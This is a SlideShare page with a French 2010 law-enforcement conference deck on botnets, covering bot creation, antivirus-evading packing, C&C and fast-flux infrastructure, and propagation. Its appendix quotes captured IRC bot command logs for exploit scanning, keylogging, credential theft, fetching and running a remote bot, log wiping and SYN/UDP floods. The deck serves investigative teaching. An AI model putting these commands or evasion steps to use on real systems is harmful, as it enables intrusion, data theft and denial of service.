Les Botnets
Colloque sur la cybercriminalité
          Avril 2010




                                   1
Alain Rioux, CISSP
  • Sergent spécialiste, MVDI, BCEDI, 
    Sûreté du Québec, depuis 2005
  • Certifications CISSP, GREM...
Michel Cusin, CISSP
 • Consultant en sécurité, Bell Canada
 • Mentor/instructeur SANS Institute
 • Certifications CISSP, C...
Les Botnets


                           Serveur de commande

      Suspect




Bot             Bot       Bot       Bot   ...
Les Botnets

•   Le programme de bot
•   Création d’un bot
•   Infrastructure du botnet
•   La propagation
•   Autres type...
Le programme

• Code source compilé en exécutable (.exe)
• Les grandes familles : 
  – Agobot/Phatbot/ForBot/XtremBot
  – ...
Création

• Les étapes :
  – Code source récupéré sur Internet ou autre moyen
  – Configuration
  – Compilation
  – Compre...
Création

• Code source
• Configuration
  – Fichier de configuration
     • Ex. StBot (Stable Bot) 1.0
  – Générateur de c...
Création

• Générateur d’exécutable




                            www.megasecurity.org
                                 ...
Création

• Packing : Compression/Chiffrement
  – Réduire la taille de l’exécutable
  – Éviter la détection par les anti‐v...
Création




           11
Test

• Antivirus en ligne (multi‐moteurs)
  – www.virustotal.com
  – virusscan.jotti.org
  – www.novirusthanks.org
  – vi...
13
Infrastructure

• Serveur de commande et contrôle
  – Type : IRC, HTTP, P2P, etc.
  – Hébergement
  – Adresse IP ou nom de...
Infrastructure

• Type de serveur
  – IRC
     • Simple, rapide, documentée et disponibilité
     • Moins convivial (ligne...
Infrastructure




                 16
Infrastructure




                                       17
            Source : securitylabs.websense.com
Source : pandasecurity.com
                             Infrastructure




 18
Infrastructure

• Hébergement
  – Un ordinateur du pirate ou un ami
  – Un serveur IRC existant (Ex. Undernet)
  – Un serv...
Infrastructure

• DNS
   – DNS dynamique : un domaine, une adresse IP variable : 
     ex.No‐IP.org, dyndns.com, yi.org, e...
Fast‐flux
 Single‐Flux




Source : www.xmcopartners.com   21
Fast‐flux 
   Double‐flux




Source : www.xmcopartners.com   22
Infrastructure

• Encore plus loin : Web 2.0 Botnet
  – Twitter
  – Facebook
  – Google/Ajax
  – Etc.




                ...
Propagation

• Deux activités : Balayage (scan) et Infection
• Dans  un  bot  traditionnel,  c’est  le  ver  qui 
  accomp...
Autonome




           25
Autonome




           26
Semi‐autonome


    Scan 24.72.x.x ->       Bot    24.72.130.224
    Faille x



                            Bot
         ...
Semi‐autonome


                            Bot



                            Bot   Bot : 24.72.130.225
Suspect
      Ser...
Semi‐autonome

Commande de balayage :

Pirate!kktr@Longueuil‐A31682EC.mc.videotron.ca TOPIC #botnet : .advscan asn1smb 75 ...
Vulnérabilités

Statistiques d’infection :

<@Pirate> .stats
<CAN|XP|SP1|00|2633|W|548> [SCAN]: Exploit Statistics: Dcom13...
Autres types

• Autres types de bots
  – IRC Bot
  – « Web » Bot
  – Autres outils




                                   ...
Le IRC Bot

• Robot IRC convertit en méchant Robot
  – Exemple de Robot IRC : Eggdrop, Windrop, 
    EnergyMech (Emech), C...
Le Web Bot

• Créé avec les nouveaux langages du Web : Java, 
  PHP, ASP, Perl, etc.
• Ciblent précisément les serveurs We...
PHP Bot




• Bot écrit en PHP
• Exploite le RFI
                               34
Autres outils

• BNC ou bouncer : plus qu’un proxy IRC, permet de 
  maintenir une connexion permanente. Ex. PsyBNC
• Vhos...
Conclusion

• Conséquences et utilisations des botnets
   – Perturbation  des  communications :  volontaire 
     (flood) ...
Conclusion

– Vol d’identité de masse : pstore, sniffer, keylogger, 
  accès aux fichiers
– Hameçonnage : hébergement du f...
Source :      38
www.nytimes.com
Conclusion

• À venir
   – La prévention
   – La détection
   – L’éradication (décontamination)
   – L’investigation
   – ...
Questions ?


        Encore plus...

     Liste de commandes
        Avec exemples



                          40
Commandes

• Informations  sur  l’hôte :  ordinateur,  système 
  d’exploitation,  paramètres  réseau,  liste  de  process...
Commandes

• Espionnage  et  vol  de  données :  liste  des  fenêtres 
  actives,  capture  d’écran,  utiliser  la  webcam...
Commandes

Informations système :
<@Pirate> [00|TWN|XP|SP0]‐277701 .si
<[00|TWN|XP|SP0]‐277701> ‐ sysinfo ‐ CPU : 1600MHz....
Commandes

Liste de processus :
<@Pirate> .ps list
<[P24|USA|44184]> [PROC] Process List:
<[P24|USA|44184]>  144   ‐ 60 K ...
Commandes

Base de registre :
<@Pirate> .reg query HKLM SoftwareMicrosoftWindowsCurrentVersionRun
<[D01|ISR|86665]> (03) S...
Commandes

Durée de vie (uptime) :
<@Pirate> .up
<[P16|GBR|48359]> [ MAIN ] Uptime: 16 days 14:52, Record Uptime: 30 days ...
Commandes

Clônage :
<@Pirate> .clone us.undernet.org 6667 #botnet ‐s
<BEL|87258> ‐ clones  ‐ Created on us.undernet.org:6...
Commandes

Démarrer un serveur :
<@Pirate> .httpd 8080 c:
<ie[hax]‐0724> [ HTTPD ] Server commencer sur http://somebot1.co...
Commandes

Lister les disques :
<@Pirate> .di
<[00|USA|4272> [DRIVES] Listing drives:
<[00|USA|4272> Disk Drive (C:), tota...
Commandes

Vol de licences :
<@Pirate> .cdkeys
<Wo|rM‐663> Microsoft Windows Product ID CD Key: (55194‐640‐0013789‐26509)....
Commandes

Enregistreur de clavier (keylogging) :
<@Pirate> .keylog #botnet‐keylog
<[05]ax]‐3480> [Keylogger] Started (log...
Commandes

Session en ligne de commande :
<@Pirate> .opendos
<ie[hax]‐069> [[1]CMD[1]] Active
<ie[hax]‐069> Microsoft Wind...
Commandes

« Killer » les autres bots :
<@Pirate> .pl
<ie4[hax]‐548>  [System Process] System SMSS.EXE CSRSS.EXE WINLOGON....
Commandes

Fraude au clic ‐ Régies Publicitaires :
<@Pirate> @open http://pirate.somesite.com/     Page contenant publicit...
Commandes

UDP :
<@Pirate> !udp 202.106.133.140 0 99999999
<ux766> Udp send to 202.106.133.140 delays 99999999 seconds
<do...
Commandes

IRC Message Flood :
<@Pirate> ‐insult SomeUser       Un autre usager IRC
<Oimec4945> (SomeUser) You are so stup...
Les Botnets
Colloque sur la cybercriminalité
           Mai 2010




                                   57
Prochain SlideShare
Chargement dans…5
×

Colloque cyber 2010 les botnets

2 278 vues

Publié le

Publié dans : Technologie
0 commentaire
1 j’aime
Statistiques
Remarques
  • Soyez le premier à commenter

Aucun téléchargement
Vues
Nombre de vues
2 278
Sur SlideShare
0
Issues des intégrations
0
Intégrations
658
Actions
Partages
0
Téléchargements
40
Commentaires
0
J’aime
1
Intégrations 0
Aucune incorporation

Aucune remarque pour cette diapositive

Colloque cyber 2010 les botnets

  1. 1. Les Botnets Colloque sur la cybercriminalité Avril 2010 1
  2. 2. Alain Rioux, CISSP • Sergent spécialiste, MVDI, BCEDI,  Sûreté du Québec, depuis 2005 • Certifications CISSP, GREM • Certificat en informatique, ULaval • « Operation Basique » • Microsoft LETech 2006‐2008 • Gold ILECA 2008, Bangkok, Thaïlande • Polytechnique, SANS (mentorat) • Développeur 2
  3. 3. Michel Cusin, CISSP • Consultant en sécurité, Bell Canada • Mentor/instructeur SANS Institute • Certifications CISSP, CEH, GCIH, OPST,  etc… • Site cusin.ca 3
  4. 4. Les Botnets Serveur de commande Suspect Bot Bot Bot Bot Bot 4
  5. 5. Les Botnets • Le programme de bot • Création d’un bot • Infrastructure du botnet • La propagation • Autres types de bot • Commandes diverses • Utilisation du botnet 5
  6. 6. Le programme • Code source compilé en exécutable (.exe) • Les grandes familles :  – Agobot/Phatbot/ForBot/XtremBot – SdBot/Rbot/UrBot/RxBot/UrxBot/JrBot • Intègre le ver et le robot IRC • Peut se retrouver sous différentes variantes (Ex.  NZM, RoseBot, Ruffbot, etc.) 6
  7. 7. Création • Les étapes : – Code source récupéré sur Internet ou autre moyen – Configuration – Compilation – Compression/Chiffrement – Test 7
  8. 8. Création • Code source • Configuration – Fichier de configuration • Ex. StBot (Stable Bot) 1.0 – Générateur de configuration • Ex. Agobot • Compilation – Ex. MS Visual Studio, GCC, etc. 8
  9. 9. Création • Générateur d’exécutable www.megasecurity.org 9
  10. 10. Création • Packing : Compression/Chiffrement – Réduire la taille de l’exécutable – Éviter la détection par les anti‐virus – Protéger le code contre la rétro‐ingénierie • Outil : le packer • Ex. UPX, Armadillo, PECompact, RLPack,  Neolite, Morphine, Themida, PELock, etc. 10
  11. 11. Création 11
  12. 12. Test • Antivirus en ligne (multi‐moteurs) – www.virustotal.com – virusscan.jotti.org – www.novirusthanks.org – virus‐trap.org – www.virscan.org – www.viruschief.com – www.filterbit.com 12
  13. 13. 13
  14. 14. Infrastructure • Serveur de commande et contrôle – Type : IRC, HTTP, P2P, etc. – Hébergement – Adresse IP ou nom de domaine • Hébergement des ressources (programme de  bots pour les mises à jour) • Si nom de domaine, enregistrement et DNS 14
  15. 15. Infrastructure • Type de serveur – IRC • Simple, rapide, documentée et disponibilité • Moins convivial (ligne de commande), Pare‐feu • Ex. UnRealIRCd, BewareIRCd, Ultimate, InspIRCd, etc. – HTTP • Port 80 (Pare‐feu), Convivial (GUI en HTML) – P2P • Décentralisé 15
  16. 16. Infrastructure 16
  17. 17. Infrastructure 17 Source : securitylabs.websense.com
  18. 18. Source : pandasecurity.com Infrastructure 18
  19. 19. Infrastructure • Hébergement – Un ordinateur du pirate ou un ami – Un serveur IRC existant (Ex. Undernet) – Un serveur dédié (payé frauduleusement ou non) – Un bot performant (serveur ou non) – Une grappe de bots performants (cluster) • Hébergement des ressources – Fournisseurs gratuits (iquebec.com, voila.fr,  freewebs.com, etc.) 19
  20. 20. Infrastructure • DNS – DNS dynamique : un domaine, une adresse IP variable :  ex.No‐IP.org, dyndns.com, yi.org, etc. – DNS Round Robbin (un domaine, plusieurs adresses IP  choisies en alternance) – DNS Netmaskordering (Comme RR, mais avec priorité basée  sur la comparaison des masques) N.B. : Le nom de domaine pointe directement sur le serveur de commande et contrôle. Ceci représente le point le plus vulnérable du botnet. Solution : Le Fast‐Flux. 20
  21. 21. Fast‐flux Single‐Flux Source : www.xmcopartners.com 21
  22. 22. Fast‐flux  Double‐flux Source : www.xmcopartners.com 22
  23. 23. Infrastructure • Encore plus loin : Web 2.0 Botnet – Twitter – Facebook – Google/Ajax – Etc. 23
  24. 24. Propagation • Deux activités : Balayage (scan) et Infection • Dans  un  bot  traditionnel,  c’est  le  ver  qui  accomplit ces tâches, il peut être autonome ou  semi‐autonome • Il recherche une ou plusieurs vulnérabilités (Ex.  DCOM, SMB, ASN, VNC, etc.)  • Démonstration : Autonome 24
  25. 25. Autonome 25
  26. 26. Autonome 26
  27. 27. Semi‐autonome Scan 24.72.x.x -> Bot 24.72.130.224 Faille x Bot 24.72.130.225 Suspect Faille x présente Serveur de commande Bot 24.72.130.226 Bot 27
  28. 28. Semi‐autonome Bot Bot Bot : 24.72.130.225 Suspect Serveur de commande Bot Bot 28
  29. 29. Semi‐autonome Commande de balayage : Pirate!kktr@Longueuil‐A31682EC.mc.videotron.ca TOPIC #botnet : .advscan asn1smb 75 5 0 201.4.x.x Balayage commandé et infection automatique :  CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfer complete: 201.4.134.6     Infection par un autre bot BRA|XP|SP1|00|1500|W|957!vtpxe@201.4.134.6 JOIN : #botnet Nouveau bot BRA|XP|SP1|00|1500|W|957!vtpxe@201.4.134.6 PRIVMSG #botnet : [SCAN]: Random Port Scan started on  201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads.  CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfer complete: 201.4.136.102 BRA|XP|SP0|00|3066|W|771!vbf@201.4.136.102 JOIN : #botnet BRA|XP|SP0|00|3066|W|771!vbf@201.4.136.102 PRIVMSG #botnet : [SCAN]: Random Port Scan started on  201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads. 29
  30. 30. Vulnérabilités Statistiques d’infection : <@Pirate> .stats <CAN|XP|SP1|00|2633|W|548> [SCAN]: Exploit Statistics: Dcom135: 0, Dcom445: 0, Dcom1025: 0, asn1http: 0,  asn1smb: 4625, asn1smbnt: 0, vnc: 0, netapi: 0, sym: 0, Total: 4625 Balayage VNC (faille authbypass) : <@Pirate> .asc vnc 100 5 200 170.x.x.x ‐s <[F]CZE|765771811> ‐ Vnc ‐ trying to root 170.123.234.19 ‐ nopass ;)  ‐ <BRA|137791145> ‐ Vnc ‐ 170.123.213.191 ‐ password ‐:12345 <ESP|37523> ‐ Vnc ‐ 170.126.235.164 ‐ password ‐:12345 <[F]POL|962379907> ‐ Vnc ‐ 170.126.165.91 ‐ password ‐:123456 30
  31. 31. Autres types • Autres types de bots – IRC Bot – « Web » Bot – Autres outils 31
  32. 32. Le IRC Bot • Robot IRC convertit en méchant Robot – Exemple de Robot IRC : Eggdrop, Windrop,  EnergyMech (Emech), Cygmech, WinMech, Darkbot,  etc. • Modifications : Furtivité, Porte dérobée, etc. • Pas de ver intégré • Installation « à la main » • Démonstration : Eggdrop 32
  33. 33. Le Web Bot • Créé avec les nouveaux langages du Web : Java,  PHP, ASP, Perl, etc. • Ciblent précisément les serveurs Web – Exemples :  • W32.Storm.Worm (2001) • PHP Bot 33
  34. 34. PHP Bot • Bot écrit en PHP • Exploite le RFI 34
  35. 35. Autres outils • BNC ou bouncer : plus qu’un proxy IRC, permet de  maintenir une connexion permanente. Ex. PsyBNC • Vhost : Avec BNC ou HostServ 35
  36. 36. Conclusion • Conséquences et utilisations des botnets – Perturbation  des  communications :  volontaire  (flood)  ou  involontaire  (consommation  de  ressources comme les pourriels) – Perturbation  des  systèmes :  Infection  virale,  coût  en ressources humaines et matériels (ex. antivirus) – Fraude au clic : régies publicitaires, concours, etc. – Warez : vol de licences, hébergement sur les bots – Web Defacement et méfaits : attaques DDoS 36
  37. 37. Conclusion – Vol d’identité de masse : pstore, sniffer, keylogger,  accès aux fichiers – Hameçonnage : hébergement du faux site, serveur  SMTP pour les pourriels, obtention d’accès sur des  sites bancaires – Extorsion : menace d’utilisation du botnet – Espionnage et vol de données – Cyberterrorisme – Cyberguerre 37
  38. 38. Source : 38 www.nytimes.com
  39. 39. Conclusion • À venir – La prévention – La détection – L’éradication (décontamination) – L’investigation – La mise en accusation et la condamnation 39
  40. 40. Questions ? Encore plus... Liste de commandes Avec exemples 40
  41. 41. Commandes • Informations  sur  l’hôte :  ordinateur,  système  d’exploitation,  paramètres  réseau,  liste  de  processus,  base de registre, etc. • Informations  sur  le  bot :  uptime,  installation,  version,  liste des contrôleurs, threads, etc. • Déplacements  :  clônage,  joindre  ou  quitter  une  chambre, se reconnecter, etc. • Démarrer  un  service :  serveur  HTTP,  FTP,  IRC,  SMTP,  proxy, etc. 41
  42. 42. Commandes • Espionnage  et  vol  de  données :  liste  des  fenêtres  actives,  capture  d’écran,  utiliser  la  webcam,  parcours  du  système  de  fichiers,  vol  des  licences,  keylogger,  sniffer, pstore, etc. • Entretien  du  système :  session  distante,  effacer  les  logs,  enlever  les  autres  bots,  télécharger  une  mise  à jour, etc. • Attaques et fraudes : attaques DDoS, fraudes au clic 42
  43. 43. Commandes Informations système : <@Pirate> [00|TWN|XP|SP0]‐277701 .si <[00|TWN|XP|SP0]‐277701> ‐ sysinfo ‐ CPU : 1600MHz.  RAM : 1,048,048KB total, 1,048,048KB free.   Disk : 20,482,840KB total, 2,578,028KB free.  OS : Windows XP (5.1, Build 2600). Sysdir : D:WINDOWSSystem32 Hostname : guiltpun‐x5q2g9 (170.125.200.173). Current User : guiltpunish.  Date : 20:Feb:2008. Time : 10:05:26. Uptime : 0d 1h 12m. <@Pirate> ‐uname <zlw281> Linux somebot1.com 2.6.19.2 #2 SMP Sun Jan 14 04:15:38 CET 2007 i686 Linux <reg279> FreeBSD somebot2.com 6.2‐STABLE FreeBSD 6.2‐STABLE #0: Tue Jan 23 12:44:26 IRKT 2007 root@v23.ispsystem.net:/usr/obj/usr/src/sys/ISPSYSTEM i386 FreeBSD Informations réseau : <@Pirate> .ni <[00|USA|1821> [ NETINFO ] [Connection Type]: LAN (LAN Connection). [Internal IP]: 129.93.231.166. [External IP]: 125.103.251.136. [Hostname]: somebot..edu. [Private]: No.[Country]: United States.[Speedtest]: Upload: 92.56 KB/s, Download: 144.35 KB/s.[Bandwidth]: Downloaded: 767MB, Uploaded: 798MB. 43
  44. 44. Commandes Liste de processus : <@Pirate> .ps list <[P24|USA|44184]> [PROC] Process List: <[P24|USA|44184]>  144   ‐ 60 K      ‐ "SystemRootSystem32smss.exe" <[P24|USA|44184]>  168   ‐ 1,660 K   ‐ "??C:WINNTsystem32csrss.exe" <[P24|USA|44184]>  188   ‐ 2,860 K   ‐ "??C:WINNTsystem32winlogon.exe" <[P24|USA|44184]>  216   ‐ 3,076 K   ‐ "C:WINNTsystem32services.exe" <[P24|USA|44184]>  228   ‐ 1,440 K   ‐ "C:WINNTsystem32lsass.exe" <[P24|USA|44184]>  404   ‐ 2,008 K   ‐ "C:WINNTsystem32svchost.exe" ... <[P24|USA|44184]>  8256  ‐ 2,112 K   ‐ "C:Program FilesInternet Exploreriexplore.exe" <[P24|USA|44184]>  8976  ‐ 13,020 K  ‐ "C:Program FilesMSN Messengermsnmsgr.exe" <[P24|USA|44184]>  4088  ‐ 3,696 K   ‐ "C:winntsystem32minimech.exe" <[P24|USA|44184]> [PROC] End of list. 44
  45. 45. Commandes Base de registre : <@Pirate> .reg query HKLM SoftwareMicrosoftWindowsCurrentVersionRun <[D01|ISR|86665]> (03) SoftwareMicrosoftWindowsCurrentVersionRunIntec Drivers32 (REG_SZ) <[D01|ISR|86665]> (04) SoftwareMicrosoftWindowsCurrentVersionRunIntec Service Drivers (REG_SZ) <[D01|ISR|86665]> (05) SoftwareMicrosoftWindowsCurrentVersionRunNeroCheck (REG_SZ) ... <[D01|ISR|86665]> [ REG ] Done with query: HKLMSoftwareMicrosoftWindowsCurrentVersionRun Threads du bot : <@Pirate> .t <ie4[hax]‐311> [ Worms SDThreads ] <ie4[hax]‐311> 0: Main thread <ie4[hax]‐311> 1: Firewall/AntiVirus/Exe Killer Mood By Pirate <ie4[hax]‐311> 2: Keys logging to C:WINNTsystem32system.dll <ie4[hax]‐311> 3: NTScan <ie4[hax]‐046> 4: [Keylogger] logging to #botnet‐keylog <ie4[hax]‐046> 5: [HTTPD] Server listening on port: 8080 root dir: c: 45 <ie4[hax]‐311> [ Worm SPYThreads ]
  46. 46. Commandes Durée de vie (uptime) : <@Pirate> .up <[P16|GBR|48359]> [ MAIN ] Uptime: 16 days 14:52, Record Uptime: 30 days 06:54. Date de l’installation : <@Pirate> .it <[P20|USA|82515]> [ MAIN ] Bot Installer Sur: 06/20/2006, 08:15 PM. Information sur le bot : <@Pirate> !version <ilgw845> pHp bOt v1 Liste de contrôleurs (login) : <@Pirate> .who <[P12|USA|18490]> [ MAIN ] Login List: <[P12|USA|18490]> <0> Pirate!user@username.users.undernet.org <[P12|USA|18490]> [ MAIN ] Login List complete. 46
  47. 47. Commandes Clônage : <@Pirate> .clone us.undernet.org 6667 #botnet ‐s <BEL|87258> ‐ clones  ‐ Created on us.undernet.org:6667, in channel #botnet. Joindre une chambre : <@Pirate> .join #botnet2 * Joins: ie[hax]‐3690 (~iehax‐51@dhcp‐0‐8‐a1‐10‐32‐76.cpe.beld.net) Quitter une chambre : <@Pirate> .part #botnet2 * Parts: ie3[hax]‐690 (~ie3hax‐6@modemcable035.85‐37‐24.mc.videotron.ca) Se reconnecter : <@Pirate> .reconnect * Quits: USA|46263 (~xwyqy@adsl‐68‐92‐219‐167.dsl.hstntx.swbell.net) (Quit: reconnecting) * Quits: USA|07769 (iogcvdu@cpe‐74‐76‐81‐213.nycap.res.rr.com) (Quit: reconnecting) 47
  48. 48. Commandes Démarrer un serveur : <@Pirate> .httpd 8080 c: <ie[hax]‐0724> [ HTTPD ] Server commencer sur http://somebot1.com:8080 <[04]ax]‐9323> [ HTTPD ] Server commencer sur http://somebot2.com:8080 Démarrer un proxy : <@Pirate> .redirect 9696 Oslo1.NO.EU.undernet.org 6666 <h4ck3d‐005> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666. <h4ck3d‐033> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666. Liste des fenêtres actives : <@Pirate> .aw <ie2[hax]‐317> Fenetre active: Multicam Surveillance System 7.0. <ie3[hax]‐778> Fenetre active: VoyagesDestination ‐ www.voyagesdestination.com ‐ Mozilla Firefox. <[30]hax]‐216> Fenetre active: Windows Live Hotmail ‐ Microsoft Internet Explorer. <ie4[hax]‐109> Fenetre active: NOD32 Scanner ‐ [Mi perfil]. <ie3[hax]‐743> Fenetre active: iTunes. 48
  49. 49. Commandes Lister les disques : <@Pirate> .di <[00|USA|4272> [DRIVES] Listing drives: <[00|USA|4272> Disk Drive (C:), total: 244,196,000KB, free: 233,507,040KB, available: 233,507,040KB. <[00|USA|4272> Disk Drive (D:), total: 244,196,000KB, free: 243,979,700KB, available: 243,979,700KB. <[00|USA|4272> Cdrom Drive (E:): Failed to stat, device not ready. <[00|USA|4272> Drive Totals (N/A), total: 488,392,000KB, free: 477,486,740KB, available: 477,486,740KB. <[00|USA|4272> [DRIVES] End of list. Capture d’écran : <@Pirate> .sc c:desktop.gif <ie4[hax]‐046> Screen capture saved to c:desktop.gif. Utiliser la webcam : <@Pirate> .ckeckcam <ie3[hax]‐976> [WebCAM On] Asti de cochon que jte voille pas mespionner le cul 49
  50. 50. Commandes Vol de licences : <@Pirate> .cdkeys <Wo|rM‐663> Microsoft Windows Product ID CD Key: (55194‐640‐0013789‐26509). <Wo|rM‐663> [CDKEYS]: Recherche Completer. Protected Storage Data (Internet Explorer) : <@Pirate> .pstore <[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite1.com/, usager:motdepasse <[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite2.com/somepage.php, usager:motdepasse Reniflage de paquets (sniffing) : <@Pirate> .sniffer <[00|ESP|855685]> [ SNIFFER ] Started packet sniffer. <[00|ESP|855685]> IRC sniff "210.84.47.226:2402" to "66.54.229.120:1863": ‐ « ... » <[00|ESP|855685]> HTTP sniff « 197.56.16.12:80" to "210.84.47.226:2501": ‐ « ... » 50
  51. 51. Commandes Enregistreur de clavier (keylogging) : <@Pirate> .keylog #botnet‐keylog <[05]ax]‐3480> [Keylogger] Started (logging to: #botnet‐keylog) <[05]ax]‐3480> (MSN Hotmail ‐ Nouveau message ‐ Microsoft Internet Explorer):  ... ( Return ) <[05]ax]‐3480> (Courrier :: Bienvenue à Agora ‐ Microsoft Internet Explorer):  ..[TAB]...[TAB][TAB] ( Return ) <ie3[hax]‐808> (Solutions en ligne ‐ AccèsD ‐ Microsoft Internet Explorer): .... (Changed window) Effacer les logs : <@Pirate> „x47x49x96 <[02|CAN|2142> ‐=[  BOT  ]=‐ Cleared 3/3 event logs. <@Pirate> „x42x40x8Fx57x13x86xB9x22 <[02|CAN|2142> ‐=[  BOT  ]=‐ DNS cache flushed. <@Pirate> „x42x40x8Fx57x13x83xA5x21 <[02|CAN|2142> ‐=[  BOT  ]=‐ ARP cache flushed. 51
  52. 52. Commandes Session en ligne de commande : <@Pirate> .opendos <ie[hax]‐069> [[1]CMD[1]] Active <ie[hax]‐069> Microsoft Windows 2000 [Version 5.00.2195] <ie[hax]‐069> (C) Copyright 1985‐2000 Microsoft Corp. <ie[hax]‐069> Z:> <@Pirate> .cmd dir <ie[hax]‐069> dir <ie[hax]‐069>  Volume in drive Z is System <ie[hax]‐069>  Volume Serial Number is 1234‐35BB <ie[hax]‐069>  Directory of Z: <ie[hax]‐069> 04/12/2006  09:39a      <DIR>          . <ie[hax]‐069> 04/12/2006  09:39a      <DIR>          .. ... [Liste des fichiers] ... <ie[hax]‐069>              194 File(s)     23,236,499 bytes <ie[hax]‐069>               52 Dir(s)  20,903,641,088 bytes free <ie[hax]‐069> Z:> 52
  53. 53. Commandes « Killer » les autres bots : <@Pirate> .pl <ie4[hax]‐548>  [System Process] System SMSS.EXE CSRSS.EXE WINLOGON.EXE SERVICES.EXE LSASS.EXE svchost.exe ccSetMgr.exe ccEvtMgr.exe SPBBCSvc.exe spoolsv.exe DWRCS.EXE svchost.exe NPFMntor.exe regsvc.exe mstask.exe MSupdate.exe WinMgmt.exe svchost.exe explorer.exe DWRCST.EXE nero.exe iexplore.exe WININET.EXE ccApp.exe svchostt.exe inkjet.exe sounds.exe iexplore.exe svchostt.exe sounds.exe symlcsvc.exe wuauclt.exe <@Pirate> .kp svchostt.exe Télécharger un nouveau bot : <@Pirate> .download http://membres.lycos.fr/pirate/winsys.exe winsys.exe 1   <[21][F]RoSe444271> downloading http://membres.lycos.fr/pirate/winsys.exe...   <[21][F]RoSe444271> downloaded 72.9 kb to winsys.exe @ 72.9 kb/sec.   <[21][F]RoSe444271> opened winsys.exe.  53
  54. 54. Commandes Fraude au clic ‐ Régies Publicitaires : <@Pirate> @open http://pirate.somesite.com/ Page contenant publicité <[2]ujfgpzgmkjb> file opened. <[2]sciuvmymwf> file opened. Synflood : <@Pirate> !syn 24.212.36.215 113 50 <[21]USA|760760273> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds. <[5]USA|084308781> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds. <[21]USA|760760273> SYN// Done with flood (35KB/sec). <[5]USA|084308781> SYN// Done with flood (129KB/sec). <@Pirate> .ddosbox 208.114.100.12 <ie[hax]‐4108> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds <ie[hax]‐9284> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds <ie[hax]‐4108> Done with DrDos Random Ack/Syn flood [18KB/sec] <ie[hax]‐9284> Done with DrDos Random Ack/Syn flood [480KB/sec] 54
  55. 55. Commandes UDP : <@Pirate> !udp 202.106.133.140 0 99999999 <ux766> Udp send to 202.106.133.140 delays 99999999 seconds <dodh546> Udp send to 202.106.133.140 delays 99999999 seconds <mmj996> Udp send to 202.106.133.140 delays 99999999 seconds <@Pirate> .wisdom.udp 159.171.175.141 2048 4096 50 <USA|949449114> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141... <[33][F]BRA|015201859> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141... Ping : <@Pirate> .ping 24.122.166.215 1000 4096 100 <DEU|24523> ‐ ping  ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms). <CAN|64836> ‐ ping  ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms). 55
  56. 56. Commandes IRC Message Flood : <@Pirate> ‐insult SomeUser Un autre usager IRC <Oimec4945> (SomeUser) You are so stupid you couldn't pour piss out of a boot if the  instructions were written on the bottom of the heel. <__mech‐__> (SomeUser) There's nothing wrong with you that a miracle couldn't cure... <PaNaDooLa> (SomeUser) For a minute there I didn't recognize you. It was the happiest minute of my life. <IrcL3aDeR> (SomeUser) Do YOU ever get tired of having yourself around? Une chambre, ex.. #montreal <@Pirate> !privmsg #montreal POUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHA HAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHA HAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHA HAHAHAHAHAHAHAHAHAHAHA 56
  57. 57. Les Botnets Colloque sur la cybercriminalité Mai 2010 57

×